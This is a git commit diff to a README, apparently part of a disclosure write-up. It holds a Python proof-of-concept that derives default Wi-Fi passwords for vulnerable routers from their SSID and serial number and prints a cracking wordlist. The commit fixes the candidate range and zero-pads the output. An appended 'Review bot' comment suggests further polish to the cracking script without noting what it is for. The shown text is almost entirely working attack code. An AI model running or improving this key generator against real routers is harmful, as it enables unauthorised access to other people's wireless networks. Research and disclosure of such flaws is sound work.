Update 'Readme.md'

nico 2020-05-06 20:01:57 +00:00
parent 350e1aa5dd
commit 0447c7daad


@ -493,28 +493,28 @@ With this information we can write a PoC script that can produce a wordlist to e
import argparse, base64, hashlib, re import argparse, base64, hashlib, re
def genpwd_longpasswd(oui, serialnum): def genpwd_longpasswd(oui, serialnum):
def str2md5(string): def str2md5(string):
m = hashlib.md5() m = hashlib.md5()
m.update(string.encode("ascii")) m.update(string.encode("ascii"))
return m.digest() return m.digest()
#secret1 = "%s-ALCL%s" % (oui, serialnum) #secret1 = "%s-ALCL%s" % (oui, serialnum)
secret2 = "%s-01%u" % (oui, int(serialnum, 16)) secret2 = "%s-01%u" % (oui, int(serialnum, 16))
#md5_secret1 = str2md5(secret1) #md5_secret1 = str2md5(secret1)
md5_secret2 = str2md5(secret2) md5_secret2 = str2md5(secret2)
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30] #wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
lower = upper = 0 lower = upper = 0
for i in range(8): for i in range(8):
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
longpasswd = ((upper<<32)+lower)%0x2540be400 longpasswd = ((upper<<32)+lower)%0x2540be400
return longpasswd return longpasswd
parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers") parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
parser.add_argument("ssid", type=str, help="the ssid to attack") parser.add_argument("ssid", type=str, help="the ssid to attack")
@ -551,8 +551,9 @@ for s in ssids:
serialBytes = args.ssid serialBytes = args.ssid
for r in s.split("[A-F0-9]{4}"): for r in s.split("[A-F0-9]{4}"):
serialBytes = serialBytes.replace(r, "") serialBytes = serialBytes.replace(r, "")
for i in range(0xffff): for i in range(0xffff + 1):
print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))) candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
print(f"{candidate:010}")
break break
``` ```
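Review bot: The zero-padding in the new `print(f"{candidate:010}")` is only correct because `genpwd_longpasswd` reduces its result modulo `0x2540be400` (10**10) in the earlier hunk, so a candidate never exceeds ten decimal digits; that dependency is invisible at the call site and deserves a comment, e.g. `# genpwd_longpasswd reduces mod 10**10, so pad to 10 digits (assumed fixed key length - verify on device)`. The new bound `range(0xffff + 1)` is correct for every four-hex-digit serial prefix but reads like a patched off-by-one; `range(0x10000)` states the intent directly. The f-string also raises the script's minimum to Python 3.6 while the rest of the PoC uses `%` and `.format`; either document the version requirement or write `print("{:010}".format(candidate))` for consistency. The enclosing `for s in ssids:` loop begins before this hunk, so the `break` cannot be judged from here.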